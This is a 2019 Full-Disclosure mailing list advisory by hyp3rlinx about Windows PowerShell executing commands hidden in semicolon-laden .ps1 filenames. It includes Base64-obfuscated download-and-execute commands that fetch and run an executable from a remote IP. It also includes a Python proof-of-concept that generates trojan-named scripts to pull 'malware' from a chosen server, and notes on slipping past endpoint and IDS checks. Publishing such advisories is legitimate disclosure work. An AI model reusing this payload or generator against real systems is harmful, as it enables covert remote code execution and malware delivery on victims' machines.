lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 1 Aug 2019 23:16:11 -0400
From: hyp3rlinx <apparitionsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Microsoft Windows PowerShell / Unsanitized Filename Command
	Execution

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for
system administrators.
PowerShell includes an interactive prompt and a scripting environment that
can be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially
named scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of
the filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself
without the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be
one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead
execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as
the vulnerably named script.

However, when such scripts are run from PowerShells shell and not "cmd.exe"
the "&" (call operator) will block our exploit from working.

Still, if the has user enabled ".ps1" scripts to open with PowerShell as
its default program, all it takes is double click the file to trigger
the exploit and the "& call operator" will no longer save you. Also, if the
user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell
"\Hello;World.ps1" will also work without dropping into the PowerShell
shell.

My PoC will download a remote executable save it to the victims machine and
then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the
vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.

C:\>powershell
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows
unexpected code execution; even when the scripts contents are visually
reviewed.
We may also be able to bypass some endpoint protection or IDS systems that
may look at the contents or header of a file but not its filename where are
commands can be stored.

For this to work the user must have enabled PowerShell as its default
program when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will
download and execute a remote executable named in this case "n.exe".
c:\>powershell
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal begining name, then separate commands using ";"
semicolon e.g.

Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1

Create the executable without a file extension to save space for the
filename then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80
or whatever.
Double click to open in PowerShell watch the file get downloaded saved and
executed!

My example is used as a "filename embedded downloader", but obviously we
can just call other secondary trojan files of various types in the same
directory.

Note: User interaction is required, and obviously running any random PS
script is dangerous... but hey we looked at the file content and it simply
printed a string!


[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability
PoC
#Create ".ps1" files with Embedded commands to download, save and execute
malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to
download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the
Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name
on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr
"+args.ipaddress+"/"+args.remote_malware_name+" -O
%CD%\\"+args.local_malware_name+" ;sleep -s 2;start
"+args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__=="__main__":

    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"




[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 20, 2019
MSRC "does not meet the bar for security servicing" : July 23, 2019
August 1, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists